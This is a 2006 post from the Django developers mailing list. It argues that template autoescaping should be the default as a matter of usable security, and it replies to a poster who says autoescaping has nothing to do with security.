On 8/22/06, Ahmad Alhashemi <[EMAIL PROTECTED]> wrote: > But if you keep poking holes in all the wrong places, then it is not > the frameworks fault. > > Autoescaping might be a nice DRY feature, but I don't think it has > anything to do with being secure by default.
Usable security is about making it easier to do the things that make or keep you secure and making it less easy to do things that are dangerous or insecure. Everybody using dj templates is putting context into them all the time; most of the time it's fine. You're trained into doing something by rote and sometimes it's wrong. Interaction with applications (even text editors and codelibs) wears grooves in the judgement of people. Escape by default is the Right way. I'd much rather see a double-escaped whoopsie than have my cookies stolen. --~--~---------~--~----~------------~-------~--~----~ You received this message because you are subscribed to the Google Groups "Django developers" group. To post to this group, send email to django-developers@googlegroups.com To unsubscribe from this group, send email to [EMAIL PROTECTED] For more options, visit this group at http://groups.google.com/group/django-developers -~----------~----~----~----~------~----~------~--~---
